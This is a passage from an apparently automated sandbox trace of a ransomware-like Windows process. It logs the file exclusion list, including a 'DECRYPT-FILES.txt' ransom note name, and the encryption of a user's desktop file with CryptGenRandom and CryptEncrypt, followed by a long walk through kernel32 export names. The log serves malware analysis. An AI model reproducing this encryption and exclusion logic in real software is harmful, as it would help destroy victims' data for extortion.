cFileName="RfkfJ2oClDUlU_N3bh.mkv", cAlternateFileName="RFKFJ2~1.MKV")) returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="autorun.inf") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="boot.ini") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="desktop.ini") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="ntuser.dat") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="iconcache.db") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="bootsect.bak") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="ntuser.dat.log") returned 1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="thumbs.db") returned -1 [0083.599] lstrcmpiW (lpString1="RfkfJ2oClDUlU_N3bh.mkv", lpString2="Bootfont.bin") returned 1 [0083.599] lstrlenW (lpString="RfkfJ2oClDUlU_N3bh.mkv") returned 22 [0083.599] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0083.599] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0083.600] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0083.600] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0083.600] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.600] lstrlenW (lpString="RfkfJ2oClDUlU_N3bh.mkv") returned 22 [0083.600] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="RfkfJ2oClDUlU_N3bh.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv" [0083.600] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RfkfJ2oClDUlU_N3bh.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfkfj2ocldulu_n3bh.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.600] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=65443) returned 1 [0083.600] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.600] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.600] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.600] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.600] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.601] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.601] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.602] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.602] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.603] CloseHandle (hObject=0x414) returned 1 [0083.603] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.603] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.604] CloseHandle (hObject=0x0) returned 0 [0083.604] CloseHandle (hObject=0x410) returned 1 [0083.604] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.604] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.605] GetTickCount () returned 0x114d5e6 [0083.605] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.605] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.605] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.605] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.605] lstrlenA (lpString="kernel32.dll") returned 12 [0083.605] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.605] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.606] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.606] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.606] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.606] lstrlenA (lpString="ADDATOMA") returned 8 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.606] lstrlenA (lpString="ADDATOMW") returned 8 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.606] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.606] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.606] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.606] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.606] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.606] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.606] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.606] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.606] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.606] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.606] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.606] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.606] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.606] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.607] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.607] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.607] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.607] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.607] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.607] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.607] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.607] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.607] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.607] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.607] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.607] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.607] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.607] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.607] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.607] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.607] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.607] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.607] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.607] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.608] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.608] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.608] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.608] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.608] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.608] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.608] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.608] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.608] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.608] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.608] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.608] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.608] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.608] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.608] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.608] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.608] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.608] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.608] lstrlenA (lpString="BEEP") returned 4 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.609] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.609] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.609] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.609] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.609] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.609] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.609] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.609] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.609] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.609] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.609] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.609] lstrlenA (lpString="CANCELIO") returned 8 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.609] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.609] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.609] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.609] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.609] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.609] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.609] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.610] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.610] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.610] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.610] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.610] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.610] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.610] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.610] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.610] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.610] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.610] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.610] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.610] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.610] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.610] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.610] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.610] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.610] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.610] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.611] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.611] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.611] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.611] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.611] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.611] lstrcpyA (in: lpString1=0x3f2d468, 